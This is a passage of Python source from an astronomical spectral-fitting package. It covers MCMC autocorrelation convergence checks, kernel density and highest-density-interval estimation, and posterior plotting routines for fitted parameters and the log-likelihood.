if (round(tau_sorted[i],1)>1.0):# & (tol[i]<autocorr_tol):
print('{0:<30}{1:<20.4f}{2:<20.4f}{3:<20.4f}{4:<20}'.format(pnames_sorted[i],best_sorted[i],tau_sorted[i],tol_sorted[i],conv_bool))
else:
print('{0:<30}{1:<20.4f}{2:<20}{3:<20}{4:<20}'.format(pnames_sorted[i],best_sorted[i],' -------- ',' -------- ',' -------- '))
print('--------------------------------------------------------------------------------------------------------')
# If convergence for median autocorrelation time
if (auto_stop==True) & (conv_type == 'median'):
par_conv = [] # converged parameter indices
par_not_conv = [] # non-converged parameter indices
for x in range(0,len(param_names),1):
if (round(tau[x],1)>1.0):# & (tol[x]<autocorr_tol):
par_conv.append(x) # Append index of parameter for which an autocorrelation time can be calculated; we use these to calculate the mean
else: par_not_conv.append(x)
# Calculate mean of parameters for which an autocorrelation time could be calculated
par_conv = np.array(par_conv) # Explicitly convert to array
par_not_conv = np.array(par_not_conv) # Explicitly convert to array
if (par_conv.size == 0) and (stop_iter == orig_max_iter):
if verbose:
print('\nIteration = %d' % (k+1))
print('-------------------------------------------------------------------------------')
print('- Not enough iterations for any autocorrelation times!')
elif ( (par_conv.size > 0) and (k+1)>(np.median(tau[par_conv]) * ncor_times) and (np.median(tol[par_conv])<autocorr_tol) and (stop_iter == max_iter) ):
if verbose:
print('\n ---------------------------------------------')
print(' | Converged at %d iterations. |' % (k+1))
print(' | Performing %d iterations of sampling... |' % min_samp )
print(' | Sampling will finish at %d iterations. |' % ((k+1)+min_samp) )
print(' ---------------------------------------------')
burn_in = (k+1)
stop_iter = (k+1)+min_samp
conv_tau = tau
converged = True
elif ((par_conv.size == 0) or ( (k+1)<(np.median(tau[par_conv]) * ncor_times)) or (np.median(tol[par_conv])>autocorr_tol)) and (stop_iter < orig_max_iter):
if verbose:
print('\nIteration = %d' % (k+1))
print('-------------------------------------------------------------------------------')
print('- Jumped out of convergence! Resetting convergence criteria...')
# Reset convergence criteria
print('- Resetting burn_in = %d' % orig_burn_in)
print('- Resetting max_iter = %d' % orig_max_iter)
burn_in = orig_burn_in
stop_iter = orig_max_iter
converged = False
if (par_conv.size>0):
pnames_sorted = param_names[i_sort]
tau_sorted = tau[i_sort]
tol_sorted = tol[i_sort]
best_sorted = np.array(best)[i_sort]
if verbose:
print('{0:<30}{1:<40}{2:<30}'.format('\nIteration = %d' % (k+1),'%d x Median Autocorr. Time = %0.2f' % (ncor_times,np.median(tau[par_conv]) * ncor_times),'Med. Tolerance = %0.2f' % np.median(tol[par_conv])))
print('--------------------------------------------------------------------------------------------------------')
print('{0:<30}{1:<20}{2:<20}{3:<20}{4:<20}'.format('Parameter','Current Value','Autocorr. Time','Tolerance','Converged?'))
print('--------------------------------------------------------------------------------------------------------')
for i in range(0,len(pnames_sorted),1):
if (((k+1)>tau_sorted[i]*ncor_times) and (tol_sorted[i]<autocorr_tol) and (tau_sorted[i]>1.0)):
conv_bool = 'True'
else: conv_bool = 'False'
if (round(tau_sorted[i],1)>1.0):# & (tol[i]<autocorr_tol):
print('{0:<30}{1:<20.4f}{2:<20.4f}{3:<20.4f}{4:<20}'.format(pnames_sorted[i],best_sorted[i],tau_sorted[i],tol_sorted[i],conv_bool))
else:
print('{0:<30}{1:<20.4f}{2:<20}{3:<20}{4:<20}'.format(pnames_sorted[i],best_sorted[i],' -------- ',' -------- ',' -------- '))
print('--------------------------------------------------------------------------------------------------------')
# If convergence for ALL autocorrelation times
if (auto_stop==True) & (conv_type == 'all'):
if ( all( (x==1.0) for x in tau) ) and (stop_iter == orig_max_iter):
if verbose:
print('\nIteration = %d' % (k+1))
print('-------------------------------------------------------------------------------')
print('- Not enough iterations for any autocorrelation times!')
elif all( ((k+1)>(x * ncor_times)) for x in tau) and all( (x>1.0) for x in tau) and all(y<autocorr_tol for y in tol) and (stop_iter == max_iter):
if verbose:
print('\n ---------------------------------------------')
print(' | Converged at %d iterations. | ' % (k+1))
print(' | Performing %d iterations of sampling... | ' % min_samp )
print(' | Sampling will finish at %d iterations. | ' % ((k+1)+min_samp) )
print(' ---------------------------------------------')
burn_in = (k+1)
stop_iter = (k+1)+min_samp
conv_tau = tau
converged = True
elif (any( ((k+1)<(x * ncor_times)) for x in tau) or any( (x==1.0) for x in tau) or any(y>autocorr_tol for y in tol)) and (stop_iter < orig_max_iter):
if verbose:
print('\n Iteration = %d' % (k+1))
print('-------------------------------------------------------------------------------')
print('- Jumped out of convergence! Resetting convergence criteria...')
# Reset convergence criteria
print('- Resetting burn_in = %d' % orig_burn_in)
print('- Resetting max_iter = %d' % orig_max_iter)
burn_in = orig_burn_in
stop_iter = orig_max_iter
converged = False
if 1:
pnames_sorted = param_names[i_sort]
tau_sorted = tau[i_sort]
tol_sorted = tol[i_sort]
best_sorted = np.array(best)[i_sort]
if verbose:
print('{0:<30}'.format('\nIteration = %d' % (k+1)))
print('--------------------------------------------------------------------------------------------------------------------------------------------')
print('{0:<30}{1:<20}{2:<20}{3:<25}{4:<20}{5:<20}'.format('Parameter','Current Value','Autocorr. Time','Target Autocorr. Time','Tolerance','Converged?'))
print('--------------------------------------------------------------------------------------------------------------------------------------------')
for i in range(0,len(pnames_sorted),1):
if (((k+1)>tau_sorted[i]*ncor_times) and (tol_sorted[i]<autocorr_tol) and (tau_sorted[i]>1.0) ):
conv_bool = 'True'
else: conv_bool = 'False'
if (round(tau_sorted[i],1)>1.0):# & (tol[i]<autocorr_tol):
print('{0:<30}{1:<20.4f}{2:<20.4f}{3:<25.4f}{4:<20.4f}{5:<20}'.format(pnames_sorted[i],best_sorted[i],tau_sorted[i],tau_sorted[i]*ncor_times,tol_sorted[i],str(conv_bool)))
else:
print('{0:<30}{1:<20.4f}{2:<20}{3:<25}{4:<20}{5:<20}'.format(pnames_sorted[i],best_sorted[i],' -------- ',' -------- ',' -------- ',' -------- '))
print('--------------------------------------------------------------------------------------------------------------------------------------------')
# If convergence for a specific set of parameters
if (auto_stop==True) & (isinstance(conv_type,tuple)==True):
# Get indices of parameters for which we want to converge; these will be the only ones we care about
par_ind = np.array([i for i, item in enumerate(param_names) if item in set(conv_type)])
# Get list of parameters, autocorrelation times, and tolerances for the ones we care about
param_interest = param_names[par_ind]
tau_interest = tau[par_ind]
tol_interest = tol[par_ind]
best_interest = np.array(best)[par_ind]
# New sort for selected parameters
i_sort = np.argsort(param_interest) # this array gives the ordered indices of parameter names (alphabetical)
if ( all( (x==1.0) for x in tau_interest) ) and (stop_iter == orig_max_iter):
if verbose:
print('\nIteration = %d' % (k+1))
print('-------------------------------------------------------------------------------')
print('- Not enough iterations for any autocorrelation times!')
elif all( ((k+1)>(x * ncor_times)) for x in tau_interest) and all( (x>1.0) for x in tau_interest) and all(y<autocorr_tol for y in tol_interest) and (stop_iter == max_iter):
if verbose:
print('\n ---------------------------------------------')
print(' | Converged at %d iterations. | ' % (k+1))
print(' | Performing %d iterations of sampling... | ' % min_samp )
print(' | Sampling will finish at %d iterations. | ' % ((k+1)+min_samp) )
print(' ---------------------------------------------')
burn_in = (k+1)
stop_iter = (k+1)+min_samp
conv_tau = tau
converged = True
elif (any( ((k+1)<(x * ncor_times)) for x in tau_interest) or any( (x==1.0) for x in tau_interest) or any(y>autocorr_tol for y in tol_interest)) and (stop_iter < orig_max_iter):
if verbose:
print('\n Iteration = %d' % (k+1))
print('-------------------------------------------------------------------------------')
print('- Jumped out of convergence! Resetting convergence criteria...')
# Reset convergence criteria
print('- Resetting burn_in = %d' % orig_burn_in)
print('- Resetting max_iter = %d' % orig_max_iter)
burn_in = orig_burn_in
stop_iter = orig_max_iter
converged = False
if 1:
pnames_sorted = param_interest[i_sort]
tau_sorted = tau_interest[i_sort]
tol_sorted = tol_interest[i_sort]
best_sorted = np.array(best_interest)[i_sort]
if verbose:
print('{0:<30}'.format('\nIteration = %d' % (k+1)))
print('--------------------------------------------------------------------------------------------------------------------------------------------')
print('{0:<30}{1:<20}{2:<20}{3:<25}{4:<20}{5:<20}'.format('Parameter','Current Value','Autocorr. Time','Target Autocorr. Time','Tolerance','Converged?'))
print('--------------------------------------------------------------------------------------------------------------------------------------------')
for i in range(0,len(pnames_sorted),1):
if (((k+1)>tau_sorted[i]*ncor_times) and (tol_sorted[i]<autocorr_tol) and (tau_sorted[i]>1.0) ):
conv_bool = 'True'
else: conv_bool = 'False'
if (round(tau_sorted[i],1)>1.0):# & (tol[i]<autocorr_tol):
print('{0:<30}{1:<20.4f}{2:<20.4f}{3:<25.4f}{4:<20.4f}{5:<20}'.format(pnames_sorted[i],best_sorted[i],tau_sorted[i],tau_sorted[i]*ncor_times,tol_sorted[i],str(conv_bool)))
else:
print('{0:<30}{1:<20.4f}{2:<20}{3:<25}{4:<20}{5:<20}'.format(pnames_sorted[i],best_sorted[i],' -------- ',' -------- ',' -------- ',' -------- '))
print('--------------------------------------------------------------------------------------------------------------------------------------------')
# Stop
if ((k+1) == stop_iter):
break
old_tau = tau
# If auto_stop=False, simply print out the parameters and their best values at that iteration
if ((k+1) % write_iter == 0) and ((k+1)>=min_iter) and ((k+1)>=write_thresh) and (auto_stop==False):
pnames_sorted = param_names[i_sort]
best_sorted = np.array(best)[i_sort]
if verbose:
print('{0:<30}'.format('\nIteration = %d' % (k+1)))
print('------------------------------------------------')
print('{0:<30}{1:<20}'.format('Parameter','Current Value'))
print('------------------------------------------------')
for i in range(0,len(pnames_sorted),1):
print('{0:<30}{1:<20.4f}'.format(pnames_sorted[i],best_sorted[i]))
print('------------------------------------------------')
elap_time = (time.time() - start_time)
run_time = time_convert(elap_time)
if verbose:
print("\n emcee Runtime = %s. \n" % (run_time))
# Write to log file
if (auto_stop==True):
# Write autocorrelation chain to log
# np.save(run_dir+'/log/autocorr_times_all',autocorr_times_all)
# np.save(run_dir+'/log/autocorr_tols_all',autocorr_tols_all)
# Create a dictionary with parameter names as keys, and contains
# the autocorrelation times and tolerances for each parameter
autocorr_times_all = np.stack(autocorr_times_all,axis=1)
autocorr_tols_all = np.stack(autocorr_tols_all,axis=1)
autocorr_dict = {}
for k in range(0,len(param_names),1):
if (np.shape(autocorr_times_all)[0] > 1):
autocorr_dict[param_names[k]] = {'tau':autocorr_times_all[k],
'tol':autocorr_tols_all[k]}
np.save(run_dir.joinpath('log', 'autocorr_dict.npy'),autocorr_dict)
if (converged == True):
write_log((burn_in,stop_iter,param_names,conv_tau,autocorr_tol,tol,ncor_times),'autocorr_results',run_dir)
elif (converged == False):
unconv_tol = (np.abs((old_tau) - (tau)) / (tau))
write_log((burn_in,stop_iter,param_names,tau,autocorr_tol,unconv_tol,ncor_times),'autocorr_results',run_dir)
write_log(run_time,'emcee_time',run_dir)
# Remove excess zeros from sampler chain if emcee converged on a solution
# in fewer iterations than max_iter
# Remove zeros from all chains
a = [] # the zero-trimmed sampler.chain
for p in range(0,np.shape(sampler.chain)[2],1):
c = sampler.chain[:,:,p]
c_trimmed = [np.delete(c[i,:],np.argwhere(c[i,:]==0)) for i in range(np.shape(c)[0])] # delete any occurrence of zero
a.append(c_trimmed)
a = np.swapaxes(a,1,0)
a = np.swapaxes(a,2,1)
# Extract metadata blobs
blobs = sampler.get_blobs()
flux_blob = blobs["fluxes"]
eqwidth_blob = blobs["eqwidths"]
cont_flux_blob = blobs["cont_fluxes"]
int_vel_disp_blob = blobs["int_vel_disp"]
log_like_blob = blobs["log_like"]
return a, burn_in, flux_blob, eqwidth_blob, cont_flux_blob, int_vel_disp_blob, log_like_blob
##################################################################################
# Autocorrelation analysis
##################################################################################
def autocorr_convergence(emcee_chain,param_names,plot=False):
"""
My own recipe for convergence.
"""
# Remove zeros from all chains
sampler_chain = []
for p in range(0,np.shape(emcee_chain)[2],1):
c = emcee_chain[:,:,p]
c_trimmed = [np.delete(c[i,:],np.argwhere(c[i,:]==0)) for i in range(np.shape(c)[0])] # delete any occurrence of zero
sampler_chain.append(c_trimmed)
sampler_chain = np.swapaxes(sampler_chain,1,0)
sampler_chain = np.swapaxes(sampler_chain,2,1)
nwalker = np.shape(sampler_chain)[0] # Number of walkers
niter = np.shape(sampler_chain)[1] # Number of iterations
npar = np.shape(sampler_chain)[2] # Number of parameters
def autocorr_func(c_x):
"""Compute the normalized autocorrelation function of each parameter chain."""
acf = []
for p in range(0,np.shape(c_x)[1],1):
x = c_x[:,p]
# Subtract the median value
rms_x = np.median(x)
x = x - rms_x
cc = np.correlate(x,x,mode='full')
cc = cc[cc.size // 2:]
cc = cc/np.max(cc)
acf.append(cc)
# Flip the array
acf = np.swapaxes(acf,1,0)
return acf
def auto_window(taus, c):
"""
(Adapted from https://github.com/dfm/emcee/blob/master/emcee/autocorr.py)
"""
m = np.arange(len(taus)) < c * taus
if np.any(m):
return np.argmin(m)
return len(taus) - 1
def integrated_time(acf, c=5, tol=0):
"""Estimate the integrated autocorrelation time of a time series.
This estimate uses the iterative procedure described on page 16 of
`Sokal's notes <http://www.stat.unc.edu/faculty/cji/Sokal.pdf>`_ to
determine a reasonable window size.
Args:
acf: The autocorrelation function(s), one column per parameter
(as returned by autocorr_func above).
c (Optional[float]): The step size for the window search. (default:
``5``)
tol (Optional[float]): The minimum number of autocorrelation times
needed to trust the estimate. (default: ``0``)
Returns:
float or array: An estimate of the integrated autocorrelation time
for each parameter.
(Adapted from https://github.com/dfm/emcee/blob/master/emcee/autocorr.py)
"""
tau_est = np.empty(np.shape(acf)[1])
windows = np.empty(np.shape(acf)[1], dtype=int)
# Loop over parameters
for p in range(0,np.shape(acf)[1],1):
taus = 2.0*np.cumsum(acf[:,p])-1.0
windows[p] = auto_window(taus, c)
tau_est[p] = taus[windows[p]]
return tau_est
c_x = np.mean(sampler_chain[:,:,:],axis=0)
acf = autocorr_func(c_x)
tau_est = integrated_time(acf)
if (plot==True):
fig = plt.figure(figsize=(14,4))
ax1 = fig.add_subplot(2,1,1)
ax2 = fig.add_subplot(2,1,2)
for c in range(0,np.shape(c_x)[1],1):
cn = (c_x[:,c])/(np.median(c_x[:,c]))
ax1.plot(cn,alpha=1.,linewidth=0.5)
ax1.axhline(1.0,alpha=1.,linewidth=0.5,color='black',linestyle='--')
ax1.set_xlim(0,np.shape(c_x)[0])
ax2.plot(range(np.shape(acf)[0]),acf,alpha=1.,linewidth=0.5,label='ACF')
ax2.axhline(0.0,alpha=1.,linewidth=0.5)
ax2.set_xlim(np.min(range(np.shape(acf)[0])),np.max(range(np.shape(acf)[0])))
plt.tight_layout()
return tau_est
##################################################################################
# Plotting Routines
##################################################################################
def gauss_kde(xs,data,h):
"""
Gaussian kernel density estimation.
"""
def gauss_kernel(x):
return (1./np.sqrt(2.*np.pi)) * np.exp(-x**2/2)
kde = np.sum((1./h) * gauss_kernel((xs.reshape(len(xs),1)-data)/h), axis=1)
kde = kde/simps(kde,xs)# normalize
return kde
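# Illustrative usage (a sketch; `samples` is a 1-D array of posterior samples):
#   xs = np.linspace(np.min(samples), np.max(samples), 200)
#   kde = gauss_kde(xs, samples, kde_bandwidth(samples))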
def kde_bandwidth(data):
"""
Silverman bandwidth estimation for kernel density estimation.
"""
return (4./(3.*len(data)))**(1./5.) * np.std(data)
def compute_HDI(posterior_samples, credible_mass):
"""
Computes highest density interval from a sample of representative values,
estimated as the shortest credible interval.
Takes arguments posterior_samples (samples from the posterior) and credible_mass (e.g., 0.95):
https://www.sciencedirect.com/topics/mathematics/highest-density-interval
BADASS uses the 0.68 interval.
"""
sorted_points = sorted(posterior_samples)
ciIdxInc = np.ceil(credible_mass * len(sorted_points)).astype('int')
nCIs = len(sorted_points) - ciIdxInc
# If the requested credible mass encompasses all of the posterior samples, then the
# CI is simply the extent of the data. This is typical of the 99.7% CI case for N<1000
if nCIs==0:
HDImin = np.min(posterior_samples)
HDImax = np.max(posterior_samples)
else:
ciWidth = [0]*nCIs
for i in range(0, nCIs):
ciWidth[i] = sorted_points[i + ciIdxInc] - sorted_points[i]
HDImin = sorted_points[ciWidth.index(min(ciWidth))]
HDImax = sorted_points[ciWidth.index(min(ciWidth))+ciIdxInc]
return(HDImin, HDImax)
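# Illustrative usage (a sketch; `flat_samples` is a 1-D array of posterior samples):
#   low_68, upp_68 = compute_HDI(flat_samples, 0.68)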
def posterior_plots(key,flat,chain,burn_in,xs,kde,h,
post_max,low_68,upp_68,low_95,upp_95,post_mean,post_std,post_med,post_mad,
run_dir
):
"""
Plot posterior distributions and chains from MCMC.
"""
# Initialize figures and axes
# Make an updating plot of the chain
fig = plt.figure(figsize=(10,8))
gs = gridspec.GridSpec(2, 2)
gs.update(wspace=0.35, hspace=0.35) # set the spacing between axes.
ax1 = plt.subplot(gs[0,0])
ax2 = plt.subplot(gs[0,1])
ax3 = plt.subplot(gs[1,0:2])
# Histogram; 'Doane' binning produces the best results from tests.
n, bins, patches = ax1.hist(flat, bins='doane', histtype="bar" , density=True, facecolor="#4200a6", alpha=1,zorder=10)
# Plot 1: Histogram plots
ax1.axvline(post_max ,linewidth=0.5,linestyle="-",color='xkcd:bright aqua',alpha=1.00,zorder=20,label=r'$p(\theta|x)_{\rm{max}}$')
#
ax1.axvline(post_max-low_68,linewidth=0.5,linestyle="--" ,color='xkcd:bright aqua',alpha=1.00,zorder=20,label=r'68% conf.')
ax1.axvline(post_max+upp_68,linewidth=0.5,linestyle="--" ,color='xkcd:bright aqua',alpha=1.00,zorder=20)
#
ax1.axvline(post_max-low_95,linewidth=0.5,linestyle=":" ,color='xkcd:bright aqua',alpha=1.00,zorder=20,label=r'95% conf.')
ax1.axvline(post_max+upp_95,linewidth=0.5,linestyle=":" ,color='xkcd:bright aqua',alpha=1.00,zorder=20)
#
# ax1.axvline(post_mean,linewidth=0.5,linestyle="--",color='xkcd:bright aqua',alpha=1.00,zorder=20,label=r'Mean')
# ax1.axvline(post_mean-post_std,linewidth=0.5,linestyle=":" ,color='xkcd:bright aqua',alpha=1.00,zorder=20,label=r'Std. Dev.')
# ax1.axvline(post_mean+post_std,linewidth=0.5,linestyle=":" ,color='xkcd:bright aqua',alpha=1.00,zorder=20)
#
# ax1.axvline(post_med,linewidth=0.5,linestyle="--",color='xkcd:bright yellow',alpha=1.00,zorder=20,label=r'Median')
# ax1.axvline(post_med-post_mad,linewidth=0.5,linestyle=":" ,color='xkcd:bright yellow',alpha=1.00,zorder=20,label=r'Med. Abs. Dev.')
# ax1.axvline(post_med+post_mad,linewidth=0.5,linestyle=":" ,color='xkcd:bright yellow',alpha=1.00,zorder=20)
#
ax1.plot(xs,kde ,linewidth=0.5,linestyle="-" ,color="xkcd:bright pink",alpha=1.00,zorder=15,label="KDE")
ax1.plot(xs,kde ,linewidth=3.0,linestyle="-" ,color="xkcd:bright pink",alpha=0.50,zorder=15)
ax1.plot(xs,kde ,linewidth=6.0,linestyle="-" ,color="xkcd:bright pink",alpha=0.20,zorder=15)
ax1.grid(b=True,which="major",axis="both",alpha=0.15,color="xkcd:bright pink",linewidth=0.5,zorder=0)
# ax1.plot(xvec,yvec,color='white')
ax1.set_xlabel(r'%s' % key,fontsize=12)
ax1.set_ylabel(r'$p$(%s)' % key,fontsize=12)
ax1.legend(loc="best",fontsize=6)
# Plot 2: best fit values
values = [post_max,low_68,upp_68,low_95,upp_95,post_mean,post_std,post_med,post_mad]
labels = [r"$p(\theta|x)_{\rm{max}}$",
r"$\rm{CI\;68\%\;low}$",r"$\rm{CI\;68\%\;upp}$",
r"$\rm{CI\;95\%\;low}$",r"$\rm{CI\;95\%\;upp}$",
r"$\rm{Mean}$",r"$\rm{Std.\;Dev.}$",
r"$\rm{Median}$",r"$\rm{Med. Abs. Dev.}$"]
start, step = 1, 0.12
vspace = np.linspace(start,1-len(labels)*step,len(labels),endpoint=False)
# Plot 2: best fit values
for i in range(len(labels)):
ax2.annotate('{0:>30}{1:<2}{2:<30.3f}'.format(labels[i],r"$\qquad=\qquad$",values[i]),
xy=(0.5, vspace[i]), xycoords='axes fraction',
xytext=(0.95, vspace[i]), textcoords='axes fraction',
horizontalalignment='right', verticalalignment='top',
fontsize=10)
ax2.axis('off')
# Plot 3: Chain plot
for w in range(0,np.shape(chain)[0],1):
ax3.plot(range(np.shape(chain)[1]),chain[w,:],color='white',linewidth=0.5,alpha=0.5,zorder=0)
	# Calculate the median and median absolute deviation of the walkers at each iteration;
	# the mean and standard deviation have been deprecated because they do not behave well
	# for outlier walkers and do not agree with the histograms.
c_med = np.median(chain,axis=0)
c_madstd = mad_std(chain)
ax3.plot(range(np.shape(chain)[1]),c_med,color='xkcd:bright pink',alpha=1.,linewidth=2.0,label='Median',zorder=10)
ax3.fill_between(range(np.shape(chain)[1]),c_med+c_madstd,c_med-c_madstd,color='#4200a6',alpha=0.5,linewidth=1.5,label='Median Absolute Dev.',zorder=5)
ax3.axvline(burn_in,linestyle='--',linewidth=0.5,color='xkcd:bright aqua',label='burn-in = %d' % burn_in,zorder=20)
ax3.grid(b=True,which="major",axis="both",alpha=0.15,color="xkcd:bright pink",linewidth=0.5,zorder=0)
ax3.set_xlim(0,np.shape(chain)[1])
	ax3.set_xlabel(r'$N_\mathrm{iter}$',fontsize=12)
ax3.set_ylabel(r'%s' % key,fontsize=12)
ax3.legend(loc='upper left')
# Save the figure
histo_dir = run_dir.joinpath('histogram_plots')
histo_dir.mkdir(parents=True, exist_ok=True)
	plt.savefig(histo_dir.joinpath('%s_MCMC.png' % (key)), bbox_inches="tight",dpi=300,format='png')
# Close plot window
fig.clear()
plt.close()
return
def param_plots(param_dict,burn_in,run_dir,plot_param_hist=True,verbose=True):
"""
Generates best-fit values, uncertainties, and plots for
free parameters from MCMC sample chains.
"""
#
if verbose:
print("\n Generating model parameter distributions...\n")
for key in param_dict:
#
if verbose:
print(' %s' % key)
chain = param_dict[key]['chain'] # shape = (nwalkers,niter)
chain[~np.isfinite(chain)] = 0
# Burned-in + Flattened (along walker axis) chain
# If burn_in is larger than the size of the chain, then
# take 50% of the chain length instead.
if (burn_in >= np.shape(chain)[1]):
burn_in = int(0.5*np.shape(chain)[1])
# Flatten the chains
flat = chain[:,burn_in:]
flat = flat.flat
# Subsample the data into a manageable size for the kde and HDI
if len(flat) > 0:
subsampled = np.random.choice(flat,size=10000)
# Histogram; 'Doane' binning produces the best results from tests.
hist, bin_edges = np.histogram(subsampled, bins='doane', density=False)
# Generate pseudo-data on the ends of the histogram; this prevents the KDE
# from weird edge behavior.
n_pseudo = 3 # number of pseudo-bins
bin_width=bin_edges[1]-bin_edges[0]
lower_pseudo_data = np.random.uniform(low=bin_edges[0]-bin_width*n_pseudo, high=bin_edges[0], size=hist[0]*n_pseudo)
upper_pseudo_data = np.random.uniform(low=bin_edges[-1], high=bin_edges[-1]+bin_width*n_pseudo, size=hist[-1]*n_pseudo)
# Calculate bandwidth for KDE (Silverman method)
h = kde_bandwidth(flat)
# Create a subsampled grid for the KDE based on the subsampled data; by
# default, we subsample by a factor of 10.
xs = np.linspace(np.min(subsampled),np.max(subsampled),10*len(hist))
# Calculate KDE
kde = gauss_kde(xs,np.concatenate([subsampled,lower_pseudo_data,upper_pseudo_data]),h)
p68 = compute_HDI(subsampled,0.68)
p95 = compute_HDI(subsampled,0.95)
post_max = xs[kde.argmax()] # posterior max estimated from KDE
post_mean = np.mean(flat)
post_med = np.median(flat)
low_68 = post_max - p68[0]
upp_68 = p68[1] - post_max
low_95 = post_max - p95[0]
upp_95 = p95[1] - post_max
post_std = np.std(flat)
post_mad = stats.median_abs_deviation(flat)
# Quality flags; flag any parameter that violates parameter limits by 1.5 sigma
flag = 0
if ( (post_max-1.5*low_68) <= (param_dict[key]['plim'][0]) ):
flag+=1
if ( (post_max+1.5*upp_68) >= (param_dict[key]['plim'][1]) ):
flag+=1
if ~np.isfinite(post_max) or ~np.isfinite(low_68) or ~np.isfinite(upp_68):
flag+=1
param_dict[key]['par_best'] = post_max # maximum of posterior distribution
param_dict[key]['ci_68_low'] = low_68 # lower 68% confidence interval
param_dict[key]['ci_68_upp'] = upp_68 # upper 68% confidence interval
param_dict[key]['ci_95_low'] = low_95 # lower 95% confidence interval
param_dict[key]['ci_95_upp'] = upp_95 # upper 95% confidence interval
param_dict[key]['mean'] = post_mean # mean of posterior distribution
param_dict[key]['std_dev'] = post_std # standard deviation
param_dict[key]['median'] = post_med # median of posterior distribution
param_dict[key]['med_abs_dev'] = post_mad # median absolute deviation
param_dict[key]['flat_chain'] = flat # flattened samples used for histogram.
param_dict[key]['flag'] = flag
if (plot_param_hist==True):
posterior_plots(key,flat,chain,burn_in,xs,kde,h,
post_max,low_68,upp_68,low_95,upp_95,post_mean,post_std,post_med,post_mad,
run_dir
)
else:
param_dict[key]['par_best'] = np.nan # maximum of posterior distribution
param_dict[key]['ci_68_low'] = np.nan # lower 68% confidence interval
param_dict[key]['ci_68_upp'] = np.nan # upper 68% confidence interval
param_dict[key]['ci_95_low'] = np.nan # lower 95% confidence interval
param_dict[key]['ci_95_upp'] = np.nan # upper 95% confidence interval
param_dict[key]['mean'] = np.nan # mean of posterior distribution
param_dict[key]['std_dev'] = np.nan # standard deviation
param_dict[key]['median'] = np.nan # median of posterior distribution
param_dict[key]['med_abs_dev'] = np.nan # median absolute deviation
param_dict[key]['flat_chain'] = flat # flattened samples used for histogram.
param_dict[key]['flag'] = 1
return param_dict
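# Minimal standalone sketch (not called by BADASS) of the histogram edge-padding
# used in param_plots() above and in the other *_plots routines below: uniform
# pseudo-data drawn just outside the histogram range keeps the Gaussian KDE from
# rolling off artificially at the edges of the sampled distribution.  The helper
# name _pad_for_kde_example is an assumption for illustration.
def _pad_for_kde_example(samples, n_pseudo=3):
	"""Sketch: extend samples with uniform pseudo-data beyond each histogram edge."""
	hist, bin_edges = np.histogram(samples, bins="doane", density=False)
	bin_width = bin_edges[1] - bin_edges[0]
	# n_pseudo bins' worth of uniform draws on each side, weighted by the edge-bin counts
	lower = np.random.uniform(low=bin_edges[0]-bin_width*n_pseudo, high=bin_edges[0], size=hist[0]*n_pseudo)
	upper = np.random.uniform(low=bin_edges[-1], high=bin_edges[-1]+bin_width*n_pseudo, size=hist[-1]*n_pseudo)
	return np.concatenate([samples, lower, upper])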
def log_like_plot(ll_blob, burn_in, nwalkers, run_dir, plot_param_hist=True,verbose=True):
"""
	Generates best-fit values, uncertainties, and plots for
	the log-likelihood from its MCMC sample chain.
"""
ll = ll_blob.T
# Burned-in + Flattened (along walker axis) chain
# If burn_in is larger than the size of the chain, then
# take 50% of the chain length instead.
if (burn_in >= np.shape(ll)[1]):
burn_in = int(0.5*np.shape(ll)[1])
# print('\n Burn-in is larger than chain length! Using 50% of chain length for burn-in...\n')
flat = ll[:,burn_in:]
flat = flat.flat
	# Old percentile-based confidence intervals; superseded by the HDI estimates below
# p = np.percentile(flat, [16, 50, 84])
# pdfmax = p[1]
# low1 = p[1]-p[0]
# upp1 = p[2]-p[1]
# Subsample the data into a manageable size for the kde and HDI
if len(flat[np.isfinite(flat)]) > 0:
subsampled = np.random.choice(flat[np.isfinite(flat)],size=10000)
# Histogram; 'Doane' binning produces the best results from tests.
hist, bin_edges = np.histogram(subsampled, bins='doane', density=False)
# Generate pseudo-data on the ends of the histogram; this prevents the KDE
# from weird edge behavior.
n_pseudo = 3 # number of pseudo-bins
bin_width=bin_edges[1]-bin_edges[0]
lower_pseudo_data = np.random.uniform(low=bin_edges[0]-bin_width*n_pseudo, high=bin_edges[0], size=hist[0]*n_pseudo)
upper_pseudo_data = np.random.uniform(low=bin_edges[-1], high=bin_edges[-1]+bin_width*n_pseudo, size=hist[-1]*n_pseudo)
# Calculate bandwidth for KDE (Silverman method)
h = kde_bandwidth(flat)
# Create a subsampled grid for the KDE based on the subsampled data; by
# default, we subsample by a factor of 10.
xs = np.linspace(np.min(subsampled),np.max(subsampled),10*len(hist))
# Calculate KDE
kde = gauss_kde(xs,np.concatenate([subsampled,lower_pseudo_data,upper_pseudo_data]),h)
p68 = compute_HDI(subsampled,0.68)
p95 = compute_HDI(subsampled,0.95)
post_max = xs[kde.argmax()] # posterior max estimated from KDE
post_mean = np.mean(flat)
post_med = np.median(flat)
low_68 = post_max - p68[0]
upp_68 = p68[1] - post_max
low_95 = post_max - p95[0]
upp_95 = p95[1] - post_max
post_std = np.std(flat)
post_mad = stats.median_abs_deviation(flat)
# Quality flags; flag any parameter that violates parameter limits by 1.5 sigma
flag = 0
if ~np.isfinite(post_max) or ~np.isfinite(low_68) or ~np.isfinite(upp_68):
flag += 1
ll_dict = {
'par_best' : post_max, # maximum of posterior distribution
'ci_68_low' : low_68, # lower 68% confidence interval
'ci_68_upp' : upp_68, # upper 68% confidence interval
'ci_95_low' : low_95, # lower 95% confidence interval
'ci_95_upp' : upp_95, # upper 95% confidence interval
'mean' : post_mean, # mean of posterior distribution
'std_dev' : post_std, # standard deviation
'median' : post_med, # median of posterior distribution
'med_abs_dev' : post_mad, # median absolute deviation
'flat_chain' : flat, # flattened samples used for histogram.
'flag' : flag,
}
if (plot_param_hist==True):
posterior_plots("LOG_LIKE",flat,ll,burn_in,xs,kde,h,
post_max,low_68,upp_68,low_95,upp_95,post_mean,post_std,post_med,post_mad,
run_dir)
else:
ll_dict = {
'par_best' : np.nan, # maximum of posterior distribution
'ci_68_low' : np.nan, # lower 68% confidence interval
'ci_68_upp' : np.nan, # upper 68% confidence interval
'ci_95_low' : np.nan, # lower 95% confidence interval
'ci_95_upp' : np.nan, # upper 95% confidence interval
'mean' : np.nan, # mean of posterior distribution
'std_dev' : np.nan, # standard deviation
'median' : np.nan, # median of posterior distribution
'med_abs_dev' : np.nan, # median absolute deviation
'flat_chain' : flat, # flattened samples used for histogram.
'flag' : 1,
}
return ll_dict
def flux_plots(flux_blob, burn_in, nwalkers, run_dir, plot_flux_hist=True,verbose=True):
"""
Generates best-fit values, uncertainties, and plots for
component fluxes from MCMC sample chains.
"""
if verbose:
